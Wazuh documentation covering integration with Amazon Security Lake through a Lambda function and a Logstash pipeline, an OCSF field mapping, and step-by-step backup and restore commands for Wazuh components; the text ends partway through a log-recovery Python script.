If you haven't already, ensure that you have enabled Amazon Security Lake by following the instructions at Getting started - Amazon Security Lake.

For multiple AWS accounts, we strongly encourage you to use AWS Organizations and set up Amazon Security Lake at the Organization level.

Creating an S3 bucket to store events

Follow the official documentation to create an S3 bucket within your organization. Use a descriptive name, for example: wazuh-aws-security-lake-raw.

Creating a Custom Source in Amazon Security Lake

Configure a custom source for Amazon Security Lake via the AWS console. Follow the official documentation to register Wazuh as a custom source.

To create the custom source:

  1. Log into your AWS console and navigate to Security Lake.

  2. Navigate to Custom Sources, and click Create custom source.

  3. Enter a descriptive name for your custom source. For example, wazuh.

  4. Choose Security Finding as the OCSF Event class.

  5. For AWS account with permission to write data, enter the AWS account ID and External ID of the custom source that will write logs and events to the data lake.

  6. For Service Access, create and use a new service role or use an existing service role that gives Security Lake permission to invoke AWS Glue.

  7. Click on Create. Upon creation, Amazon Security Lake automatically creates an AWS Service Role with permissions to push files into the Security Lake bucket, under the proper prefix named after the custom source name. An AWS Glue Crawler is also created to populate the AWS Glue Data Catalog automatically.

  8. Finally, collect the S3 bucket details, as these will be needed in the next step. Make sure you have the following information:

    • The Amazon Security Lake S3 region.

    • The S3 bucket name (e.g., aws-security-data-lake-us-east-1-AAABBBCCCDDD).

Creating an AWS Lambda function

Follow the official documentation to create an AWS Lambda function:

  1. Select Python 3.12 as the runtime.

  2. Configure the Lambda function to use 512 MB of memory and a 30-second timeout.

  3. Configure a trigger so that every object with a .txt extension uploaded to the S3 bucket created previously invokes the Lambda function.

  4. Create a zip deployment package and upload it to the S3 bucket created previously as per these instructions. The code is hosted in the Wazuh Indexer repository. Use the Makefile to generate the zip package wazuh_to_amazon_security_lake.zip. A command-line sketch for uploading the package and configuring the function is shown after this list.

    $ git clone https://github.com/wazuh/wazuh-indexer.git && cd wazuh-indexer
    $ git checkout v5.0.0
    $ cd integrations/amazon-security-lake
    $ make
    
  5. Configure the Lambda with these environment variables.

    Environment variable    Required    Value
    AWS_BUCKET              True        The name of the Amazon S3 bucket in which Security Lake stores your custom source data
    SOURCE_LOCATION         True        The Data source name of the Custom Source
    ACCOUNT_ID              True        Enter the ID that you specified when creating your Amazon Security Lake custom source
    REGION                  True        AWS Region to which the data is written
    S3_BUCKET_OCSF          False       S3 bucket to which the mapped events are written
    OCSF_CLASS              False       The OCSF class to map the events into. Can be SECURITY_FINDING (default) or DETECTION_FINDING.

    Note

    The DETECTION_FINDING class is not supported by Amazon Security Lake yet.
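If you prefer to manage the function from the command line, the deployment package from step 4 and the environment variables above can also be applied with the AWS CLI. This is a minimal sketch, assuming AWS CLI v2 and a hypothetical function name wazuh-to-security-lake; replace the placeholders with your own values:

    $ aws s3 cp wazuh_to_amazon_security_lake.zip s3://wazuh-aws-security-lake-raw/
    $ aws lambda update-function-code \
        --function-name wazuh-to-security-lake \
        --s3-bucket wazuh-aws-security-lake-raw \
        --s3-key wazuh_to_amazon_security_lake.zip
    $ aws lambda update-function-configuration \
        --function-name wazuh-to-security-lake \
        --environment "Variables={AWS_BUCKET=<SECURITY_LAKE_S3_BUCKET>,SOURCE_LOCATION=wazuh,ACCOUNT_ID=<AWS_ACCOUNT_ID>,REGION=<AWS_REGION>}"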

Validation

To validate that the Lambda function is properly configured and works as expected, create a test file with the following command.

$ touch "$(date +'%Y%m%d')_ls.s3.wazuh-test-events.$(date +'%Y-%m-%dT%H.%M').part00.txt"

Add the sample events below to the file and upload it to the S3 bucket.

{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:20:46.976+0000","rule":{"mail":false,"gdpr":["IV_30.1.g"],"groups":["audit","audit_command"],"level":3,"firedtimes":1,"id":"80791","description":"Audit: Command: /usr/sbin/crond"},"location":"","agent":{"id":"004","ip":"47.204.15.21","name":"Ubuntu"},"data":{"audit":{"type":"NORMAL","file":{"name":"/etc/sample/file"},"success":"yes","command":"cron","exe":"/usr/sbin/crond","cwd":"/home/wazuh"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:20:46.976Z"}
{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:22:03.034+0000","rule":{"mail":false,"gdpr":["IV_30.1.g"],"groups":["audit","audit_command"],"level":3,"firedtimes":1,"id":"80790","description":"Audit: Command: /usr/sbin/bash"},"location":"","agent":{"id":"007","ip":"24.273.97.14","name":"Debian"},"data":{"audit":{"type":"PATH","file":{"name":"/bin/bash"},"success":"yes","command":"bash","exe":"/usr/sbin/bash","cwd":"/home/wazuh"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:22:03.034Z"}
{"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"timestamp":"2024-04-22T14:22:08.087+0000","rule":{"id":"1740","mail":false,"description":"Sample alert 1","groups":["ciscat"],"level":9},"location":"","agent":{"id":"006","ip":"207.45.34.78","name":"Windows"},"data":{"cis":{"rule_title":"CIS-CAT 5","timestamp":"2024-04-22T14:22:08.087+0000","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","result":"notchecked","pass":52,"fail":0,"group":"Access, Authentication and Authorization","unknown":61,"score":79,"notchecked":1,"@timestamp":"2024-04-22T14:22:08.087+0000"}},"predecoder":{},"manager":{"name":"wazuh-manager"},"id":"1580123327.49031","decoder":{},"@version":"1","@timestamp":"2024-04-22T14:22:08.087Z"}
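To upload the test file, you can use the AWS CLI. This is a sketch assuming the example raw events bucket name used earlier; replace the file name with the one generated by the touch command:

    $ aws s3 cp <TEST_FILE_NAME>.txt s3://wazuh-aws-security-lake-raw/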

A successful execution of the Lambda function will map these events into the OCSF Security Finding Class and write them to the Amazon Security Lake S3 bucket in Parquet format, properly partitioned based on the Custom Source name, Account ID, AWS Region and date, as described in the official documentation.
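To confirm the result, you can list the Security Lake bucket for new Parquet objects and review the function's CloudWatch logs. A quick check, assuming AWS CLI v2 and the default /aws/lambda/<FUNCTION_NAME> log group naming:

    $ aws s3 ls s3://<SECURITY_LAKE_S3_BUCKET>/ --recursive | grep -i wazuh
    $ aws logs tail /aws/lambda/<FUNCTION_NAME> --since 15m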

Installing and configuring Logstash

Install Logstash on a dedicated server or on the server hosting the Wazuh Indexer. Logstash forwards the data from the Wazuh Indexer to the AWS S3 bucket created previously.

  1. Follow the official documentation to install Logstash.

  2. Install the logstash-input-opensearch plugin. In most cases, this plugin is already installed by default.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh Indexer root certificate to the Logstash server, placing it in any folder of your choice (e.g., /usr/share/logstash/root-ca.pem).

  4. Grant the logstash user the required permission to access certificates, log directories, data directories, and configuration files.

    $ sudo chmod 755 </PATH/TO/LOGSTASH_CERTS>/root-ca.pem
    $ sudo chown -R logstash:logstash /var/log/logstash
    $ sudo chmod -R 755 /var/log/logstash
    $ sudo chown -R logstash:logstash /var/lib/logstash
    $ sudo chown -R logstash:logstash /etc/logstash
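Before configuring the pipeline, you can optionally confirm that the plugin is installed and that the certificate is readable by the logstash user. A quick check along these lines:

    $ sudo /usr/share/logstash/bin/logstash-plugin list | grep opensearch
    $ sudo -u logstash head -c 1 </PATH/TO/LOGSTASH_CERTS>/root-ca.pem > /dev/null && echo "certificate is readable"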
    
Configuring the Logstash pipeline

A Logstash pipeline allows Logstash to use plugins to read data from the Wazuh Indexer and send it to an AWS S3 bucket.

The Logstash pipeline requires access to the following secrets:

  • Wazuh Indexer credentials: INDEXER_USERNAME and INDEXER_PASSWORD.

  • AWS credentials for the account with permissions to write to the S3 bucket: AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.

  • AWS S3 bucket details: AWS_REGION and S3_BUCKET (the S3 bucket name for raw events).

  1. Use the Logstash keystore to securely store these values (see the keystore example after the pipeline configuration below).

  2. Create the configuration file indexer-to-s3.conf in the /etc/logstash/conf.d/ folder:

    $ sudo touch /etc/logstash/conf.d/indexer-to-s3.conf
    
  3. Add the following configuration to the indexer-to-s3.conf file.

    input {
        opensearch {
            hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
            user  =>  "${INDEXER_USERNAME}"
            password  =>  "${INDEXER_PASSWORD}"
            ssl => true
            ca_file => "</PATH/TO/LOGSTASH_CERTS>/root-ca.pem"
            index =>  "wazuh-alerts-4.x-*"
            query =>  '{
                "query": {
                    "range": {
                        "@timestamp": {
                        "gt": "now-5m"
                        }
                    }
                }
            }'
            schedule => "*/5 * * * *"
        }
    }
    
    output {
        stdout {
            id => "output.stdout"
            codec => json_lines
        }
        s3 {
            id => "output.s3"
            access_key_id => "${AWS_ACCESS_KEY_ID}"
            secret_access_key => "${AWS_SECRET_ACCESS_KEY}"
            region => "${AWS_REGION}"
            bucket => "${S3_BUCKET}"
            codec => "json_lines"
            retry_count => 0
            validate_credentials_on_root_bucket => false
            prefix => "%{+YYYY}%{+MM}%{+dd}"
            server_side_encryption => true
            server_side_encryption_algorithm => "AES256"
            additional_settings => {
            "force_path_style" => true
            }
            time_file => 5
        }
    }
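For reference, the ${INDEXER_USERNAME}, ${INDEXER_PASSWORD}, ${AWS_ACCESS_KEY_ID}, ${AWS_SECRET_ACCESS_KEY}, ${AWS_REGION}, and ${S3_BUCKET} values referenced above can be stored with the Logstash keystore mentioned in step 1. A sketch, assuming the keystore lives under /etc/logstash; each add command prompts for the value:

    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add INDEXER_USERNAME
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add INDEXER_PASSWORD
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add AWS_ACCESS_KEY_ID
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add AWS_SECRET_ACCESS_KEY
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add AWS_REGION
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add S3_BUCKET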
    
Running Logstash
  1. Run Logstash from the CLI with your configuration:

    • Logstash 8.x and earlier versions:

      $ sudo systemctl stop logstash
      $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/indexer-to-s3.conf --path.settings /etc/logstash --config.test_and_exit
      
    • Logstash 9.x and later versions:

      $ sudo systemctl stop logstash
      $ sudo -u logstash /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/indexer-to-s3.conf --path.settings /etc/logstash --config.test_and_exit
      
  2. After confirming that the configuration loads correctly without errors, run Logstash as a service.

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
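Once the service is running, you can check that objects are arriving in the raw events bucket. Because the pipeline query runs every five minutes and the S3 output rotates files every five minutes (time_file => 5), allow a few minutes before checking. A quick check, assuming the date-based prefix configured above; replace <S3_BUCKET_NAME> with your raw events bucket name:

    $ aws s3 ls s3://<S3_BUCKET_NAME>/$(date +%Y%m%d)/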
    
OCSF Mapping

The integration maps Wazuh Security Events to the OCSF v1.1.0 Security Finding (2001) Class.

The tables below represent how the Wazuh Security Events are mapped into the OCSF Security Finding Class.

Note

These tables do not reflect any transformation or evaluation of the data. Some evaluation and transformation of the data is necessary for a correct representation in OCSF that matches all requirements.

Metadata

OCSF Key                        OCSF Value Type    Value
category_uid                    Integer            2
category_name                   String             "Findings"
class_uid                       Integer            2001
class_name                      String             "Security Finding"
type_uid                        Long               200101
metadata.product.name           String             "Wazuh"
metadata.product.vendor_name    String             "Wazuh, Inc."
metadata.product.version        String             "4.9.0"
metadata.product.lang           String             "en"
metadata.log_name               String             "Security events"
metadata.log_provider           String             "Wazuh"

Security events

OCSF Key                  OCSF Value Type    Wazuh Event Value
activity_id               Integer            1
time                      Timestamp          timestamp
message                   String             rule.description
count                     Integer            rule.firedtimes
finding.uid               String             id
finding.title             String             rule.description
finding.types             String Array       input.type
analytic.category         String             rule.groups
analytic.name             String             decoder.name
analytic.type             String             "Rule"
analytic.type_id          Integer            1
analytic.uid              String             rule.id
risk_score                Integer            rule.level
attacks.tactic.name       String             rule.mitre.tactic
attacks.technique.name    String             rule.mitre.technique
attacks.technique.uid     String             rule.mitre.id
attacks.version           String             "v13.1"
nist                      String Array       rule.nist_800_53
severity_id               Integer            convert(rule.level)
status_id                 Integer            99
resources.name            String             agent.name
resources.uid             String             agent.id
data_sources              String Array       ['_index', 'location', 'manager.name']
raw_data                  String             full_log

Troubleshooting

Issue: The Wazuh alert data is available in the Amazon Security Lake S3 bucket, but the Glue Crawler fails to parse the data into the Security Lake.

Resolution: This issue typically occurs when the custom source created for the integration uses the wrong event class. Make sure you create the custom source with the Security Finding event class.

Issue: The Wazuh alert data is available in the auxiliary S3 bucket, but the Lambda function does not trigger or fails.

Resolution: This usually happens if the Lambda function is not properly configured, or if the data is not in the correct format. Test the Lambda function following this guide.

Issue: Logstash fails to start with the message: Path "/var/lib/logstash/queue" must be a writable directory. It is not writable.

Resolution: The logstash user does not have permission to write to one or more required directories. Grant the necessary permissions:

sudo chown -R logstash:logstash /var/log/logstash
sudo chmod -R 755 /var/log/logstash
sudo chown -R logstash:logstash /var/lib/logstash
sudo chown -R logstash:logstash /etc/logstash

Issue: Logstash 9.0+ fails with: Running Logstash as a superuser is not allowed.

Resolution: Starting from Logstash 9.0, running as the root user is blocked for security reasons. Run Logstash using the logstash system account:

sudo -u logstash /usr/share/logstash/bin/logstash \
       -f /etc/logstash/conf.d/indexer-to-s3.conf \
       --path.settings /etc/logstash --config.test_and_exit

Backup guide

In this section you can find instructions on how to create and restore a backup of your Wazuh installation.

To create this backup, copy the key files to a designated folder while preserving file permissions, ownership, and directory structure. This ensures that you can later restore your Wazuh data, certificates, and configurations by transferring the files back to their original locations. This method is particularly useful when migrating your Wazuh installation to a new system.
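The commands below rely on rsync for this. As a brief illustration of the approach, assuming a hypothetical backup of a single file: -a preserves permissions, ownership, and timestamps, -R recreates the full relative path under the destination, -E preserves executability, and -z compresses data in transit. This is also why the restore commands later copy from relative paths such as var/ossec/etc/ inside the backup folder.

    # bkp_folder=~/wazuh_files_backup/$(date +%F_%H:%M)
    # mkdir -p $bkp_folder
    # rsync -aREz /var/ossec/etc/ossec.conf $bkp_folder
    # ls $bkp_folder/var/ossec/etc/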

Creating a backup

This guide explains how to create a backup of your Wazuh files, such as logs and configurations. Backing up Wazuh files is useful when migrating your Wazuh installation to a different system.

The Restoring Wazuh from backup documentation provides a guide to restore a backup of your Wazuh central components and Wazuh agent files.

Wazuh central components

To create a backup of the central components of your Wazuh installation, follow these steps. Repeat them on every cluster node you want to back up.

Note

You need root user privileges to execute the commands below.

Preparing the backup
  1. Create the destination folder to store the files. For version control, add the date and time of the backup to the name of the folder.

    # bkp_folder=~/wazuh_files_backup/$(date +%F_%H:%M)
    # mkdir -p $bkp_folder && echo $bkp_folder
    
  2. Save the host information.

    # cat /etc/*release* > $bkp_folder/host-info.txt
    # echo -e "\n$(hostname): $(hostname -I)" >> $bkp_folder/host-info.txt
    
Backing up the Wazuh server
  1. Back up the Wazuh server data and configuration files.

    # rsync -aREz \
    /etc/filebeat/ \
    /etc/postfix/ \
    /var/ossec/api/configuration/ \
    /var/ossec/etc/client.keys \
    /var/ossec/etc/sslmanager* \
    /var/ossec/etc/ossec.conf \
    /var/ossec/etc/internal_options.conf \
    /var/ossec/etc/local_internal_options.conf \
    /var/ossec/etc/rules/local_rules.xml \
    /var/ossec/etc/decoders/local_decoder.xml \
    /var/ossec/etc/shared/ \
    /var/ossec/logs/ \
    /var/ossec/queue/agentless/ \
    /var/ossec/queue/agents-timestamp \
    /var/ossec/queue/fts/ \
    /var/ossec/queue/rids/ \
    /var/ossec/stats/ \
    /var/ossec/var/multigroups/ $bkp_folder
    
  2. If present, back up certificates and additional configuration files.

    # rsync -aREz \
    /var/ossec/etc/*.pem \
    /var/ossec/etc/authd.pass $bkp_folder
    
  3. Back up your custom files. If you have custom active responses, CDB lists, integrations, or wodles, adapt the following command accordingly.

    # rsync -aREz \
    /var/ossec/active-response/bin/<custom_AR_script> \
    /var/ossec/etc/lists/<user_cdb_list>.cdb \
    /var/ossec/integrations/<custom_integration_script> \
    /var/ossec/wodles/<custom_wodle_script> $bkp_folder
    
  4. Stop the Wazuh manager service to prevent modification attempts while copying the Wazuh databases.

    # systemctl stop wazuh-manager
    
  5. Back up the Wazuh databases. They hold collected data from agents.

    # rsync -aREz \
    /var/ossec/queue/db/ $bkp_folder
    
  6. Start the Wazuh manager service.

    # systemctl start wazuh-manager
    
Backing up the Wazuh indexer and dashboard
  1. Back up the Wazuh indexer certificates and configuration files.

    # rsync -aREz \
    /etc/wazuh-indexer/certs/ \
    /etc/wazuh-indexer/jvm.options \
    /etc/wazuh-indexer/jvm.options.d \
    /etc/wazuh-indexer/log4j2.properties \
    /etc/wazuh-indexer/opensearch.yml \
    /etc/wazuh-indexer/opensearch.keystore \
    /etc/wazuh-indexer/opensearch-observability/ \
    /etc/wazuh-indexer/opensearch-reports-scheduler/ \
    /etc/wazuh-indexer/opensearch-security/ \
    /usr/lib/sysctl.d/wazuh-indexer.conf $bkp_folder
    
  2. Back up the Wazuh dashboard certificates and configuration files.

    # rsync -aREz \
    /etc/wazuh-dashboard/certs/ \
    /etc/wazuh-dashboard/opensearch_dashboards.yml \
    /usr/share/wazuh-dashboard/config/opensearch_dashboards.keystore \
    /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml $bkp_folder
    
  3. If present, back up your downloads and custom images.

    # rsync -aREz \
    /usr/share/wazuh-dashboard/data/wazuh/downloads/ \
    /usr/share/wazuh-dashboard/plugins/wazuh/public/assets/custom/images/ $bkp_folder
    

Note

While you're already backing up alert files, consider backing up the cluster indices and state as well. State includes cluster settings, node information, index metadata, and shard allocation.

Check the backup
  1. Verify that the Wazuh manager is active and list all the backed up files:

    # systemctl status wazuh-manager
    
    # find $bkp_folder -type f | sed "s|$bkp_folder/||" | less
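If the backup will be restored on a different server, it is typically transferred as a single archive. A sketch, assuming SSH access to the new server; the same archive name is used in the restore guide:

    # tar -cvzf wazuh_central_components.tar.gz ~/wazuh_files_backup/
    # scp wazuh_central_components.tar.gz root@<NEW_SERVER_ADDRESS>:/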
    

Wazuh agent

To create a backup of your Wazuh agent installation, follow these steps.

Note

You need elevated privileges to execute the commands below.

Preparing the backup
  1. On the agent machine you're backing up, run the following commands to create the destination folder where the files will be stored. These commands add the date and time to the folder name to keep these files separate from any older backups you might have.

    # bkp_folder=~/wazuh_files_backup/$(date +%F_%H:%M)
    # mkdir -p $bkp_folder && echo $bkp_folder
    
Backing up a Wazuh agent
  1. Back up Wazuh agent data, certificates, and configuration files.

    # rsync -aREz \
    /var/ossec/etc/client.keys \
    /var/ossec/etc/ossec.conf \
    /var/ossec/etc/internal_options.conf \
    /var/ossec/etc/local_internal_options.conf \
    /var/ossec/etc/*.pem \
    /var/ossec/logs/ \
    /var/ossec/queue/rids/ $bkp_folder
    
  2. Back up your custom files such as local SCA policies, active response scripts, and wodles.

    # rsync -aREz /var/ossec/etc/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> $bkp_folder
    # rsync -aREz /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> $bkp_folder
    # rsync -aREz /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> $bkp_folder
    
Checking the backup
  1. Check that all the backed up files are in place:

    # find $bkp_folder -type f | sed "s|$bkp_folder/||" | less
    

Restoring Wazuh from backup

This guide explains how to restore a backup of your Wazuh files, such as logs and configurations. Restoring Wazuh files can be useful when migrating your Wazuh installation to a different system. To carry out this restoration, you first need to back up the necessary files. The Creating a backup documentation provides a guide you can follow to create a backup of the Wazuh central components and Wazuh agent data.

Note

This guide is designed specifically for restoration from a backup of the same version.

Wazuh central components

Perform the following actions to restore the Wazuh central components data, depending on your deployment type.

Note

For a multi-node setup, there should be a backup file for each node within the cluster. You need root user privileges to execute the commands below.

Single-node data restoration

You need to have a new installation of Wazuh. Follow the Quickstart guide to perform a fresh installation of the Wazuh central components on a new server.

The actions below will guide you through the data restoration process for a single-node deployment.

Preparing the data restoration
  1. Compress the files generated after performing Wazuh files backup and transfer them to the new server:

    # tar -cvzf wazuh_central_components.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the root / directory of your node:

    # mv wazuh_central_components.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files:

    # tar -xzvf wazuh_central_components.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh indexer files

Perform the following steps to restore the Wazuh indexer files on the new server.

  1. Stop the Wazuh indexer to prevent any modifications to the Wazuh indexer files during the restoration process:

    # systemctl stop wazuh-indexer
    
  2. Restore the Wazuh indexer configuration files and change the file permissions and ownerships accordingly:

    # sudo cp etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options
    # sudo cp -r etc/wazuh-indexer/jvm.options.d/* /etc/wazuh-indexer/jvm.options.d/
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options.d
    # sudo cp etc/wazuh-indexer/log4j2.properties /etc/wazuh-indexer/log4j2.properties
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/log4j2.properties
    # sudo cp etc/wazuh-indexer/opensearch.keystore /etc/wazuh-indexer/opensearch.keystore
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch.keystore
    # sudo cp -r etc/wazuh-indexer/opensearch-observability/* /etc/wazuh-indexer/opensearch-observability/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-observability/
    # sudo cp -r etc/wazuh-indexer/opensearch-reports-scheduler/* /etc/wazuh-indexer/opensearch-reports-scheduler/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-reports-scheduler/
    # sudo cp usr/lib/sysctl.d/wazuh-indexer.conf /usr/lib/sysctl.d/wazuh-indexer.conf
    
  3. Start the Wazuh indexer service:

    # systemctl start wazuh-indexer
    
Restoring Wazuh server files

Perform the following steps to restore the Wazuh server files on the new server.

  1. Stop the Wazuh manager and Filebeat to prevent any modification to the Wazuh server files during the restore process:

    # systemctl stop filebeat
    # systemctl stop wazuh-manager
    
  2. Copy the Wazuh server data and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/filebeat/filebeat.reference.yml /etc/filebeat/
    # sudo cp etc/filebeat/fields.yml /etc/filebeat/
    # sudo cp -r etc/filebeat/modules.d/* /etc/filebeat/modules.d/
    # sudo cp -r etc/postfix/* /etc/postfix/
    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/client.keys
    # sudo cp -r var/ossec/etc/sslmanager* /var/ossec/etc/
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/rules/* /var/ossec/etc/rules/
    # chown -R wazuh:wazuh /var/ossec/etc/rules/
    # sudo cp -r var/ossec/etc/decoders/* /var/ossec/etc/decoders
    # chown -R wazuh:wazuh /var/ossec/etc/decoders/
    # sudo cp -r var/ossec/etc/shared/* /var/ossec/etc/shared/
    # chown -R wazuh:wazuh /var/ossec/etc/shared/
    # chown root:wazuh /var/ossec/etc/shared/ar.conf
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/agentless/*  /var/ossec/queue/agentless/
    # chown -R wazuh:wazuh /var/ossec/queue/agentless/
    # sudo cp var/ossec/queue/agents-timestamp /var/ossec/queue/
    # chown root:wazuh /var/ossec/queue/agents-timestamp
    # sudo cp -r var/ossec/queue/fts/* /var/ossec/queue/fts/
    # chown -R wazuh:wazuh /var/ossec/queue/fts/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    # sudo cp -r var/ossec/stats/* /var/ossec/stats/
    # chown -R wazuh:wazuh /var/ossec/stats/
    # sudo cp -r var/ossec/var/multigroups/* /var/ossec/var/multigroups/
    # chown -R wazuh:wazuh /var/ossec/var/multigroups/
    
  3. Restore certificates for Wazuh agent and Wazuh server communication, and additional configuration files if present:

    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp var/ossec/etc/authd.pass /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/authd.pass
    
  4. Restore your custom files. If you have custom active response scripts, CDB lists, integrations, or wodles, adapt the following commands accordingly:

    # sudo cp var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT>
    # sudo cp var/ossec/etc/lists/<USER_CDB_LIST>.cdb /var/ossec/etc/lists/
    # chown root:wazuh /var/ossec/etc/lists/<USER_CDB_LIST>.cdb
    # sudo cp var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT> /var/ossec/integrations/
    # chown root:wazuh /var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  5. Restore the Wazuh databases that contain collected data from the Wazuh agents:

    # sudo cp var/ossec/queue/db/* /var/ossec/queue/db/
    # chown -R wazuh:wazuh /var/ossec/queue/db/
    
  6. Start the Filebeat service:

    # systemctl start filebeat
    
  7. Start the Wazuh manager service:

    # systemctl start wazuh-manager
    
Restoring Wazuh dashboard files

If your backup includes Wazuh reports or custom images, perform the following steps to restore them on the new server.

  1. Restore your Wazuh reports using the following command:

    # mkdir -p /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # sudo cp -r usr/share/wazuh-dashboard/data/wazuh/downloads/reports/* /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # chown -R wazuh-dashboard:wazuh-dashboard /usr/share/wazuh-dashboard/data/wazuh/downloads/
    
  2. Navigate to Dashboard management > App Settings > Custom branding from the Wazuh dashboard and upload your custom images.

Restoring old logs

By default, Wazuh compresses logs that are older than one day. The old logs restored in the Restoring Wazuh server files section therefore remain compressed.

Perform the following actions on your Wazuh server to decompress these logs and index them in the new Wazuh indexer:

Note

Restored old logs will have a creation date corresponding to the day the restoration is performed.

  1. Create a Python script called recovery.py on your Wazuh server. This script decompresses all the old logs and stores them in the recovery.json file in the /tmp directory:

    # touch recovery.py
    
  2. Add the following content to the recovery.py script:

    #!/usr/bin/env python
    
    import gzip
    import time
    import json
    import argparse
    import re
    import os
    from datetime import datetime
    from datetime import timedelta
    
    def log(msg):
        now_date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        final_msg = "{0} wazuh-reinjection: {1}".format(now_date, msg)
        print(final_msg)
        if log_file:
            f_log.write(final_msg + "\n")
    
    EPS_MAX = 400
    wazuh_path = '/var/ossec/'
    max_size=1
    log_file = None
    
    parser = argparse.ArgumentParser(description='Reinjection script')
    parser.add_argument('-eps','--eps', metavar='eps', type=int, required = False, help='Events per second.')
    parser.add_argument('-min', '--min_timestamp', metavar='min_timestamp', type=str, required = True, help='Min timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-max', '--max_timestamp', metavar='max_timestamp', type=str, required = True, help='Max timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-o', '--output_file', metavar='output_file', type=str, required = True, help='Output filename.')
    parser.add_argument('-log', '--log_file', metavar='log_file', type=str, required = False, help='Logs output')
    parser.add_argument('-w', '--wazuh_path', metavar='wazuh_path', type=str, required = False, help='Path to Wazuh. By default:/var/ossec/')
    parser.add_argument('-sz', '--max_size', metavar='max_size', type=float, required = False, help='Max output file size in Gb. Default: 1Gb. Example: 2.5')
    
    args = parser.parse_args()
    
    if args.log_file:
        log_file = args.log_file
        f_log = open(log_file, 'a+')
    
    
    if args.max_size:
        max_size = args.max_size
    
    if args.wazuh_path:
        wazuh_path = args.wazuh_path
    
    output_file = args.output_file
    
    #Gb to bytes
    max_bytes = int(max_size * 1024 * 1024 * 1024)
    
    if (max_bytes <= 0):
        log("Error: Incorrect max_size")
        exit(1)
    
    month_dict = ['Null','Jan','Feb','Mar','Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov','Dec']
    
    if args.eps:
        EPS_MAX = args.eps
    
    if EPS_MAX < 0:
        log("Error: incorrect EPS")
        exit(1)
    
    min_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.min_timestamp)
    if min_date:
        min_year = int(min_date.group(1))
        min_month = int(min_date.group(2))
        min_day = int(min_date.group(3))
    else:
        log("Error: Incorrect min timestamp")
        exit(1)
    
    max_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.max_timestamp)
    if max_date:
        max_year = int(max_date.group(1))
        max_month = int(max_date.group(2))
        max_day = int(max_date.group(3))
    else:
        log("Error: Incorrect max timestamp")
        exit(1)
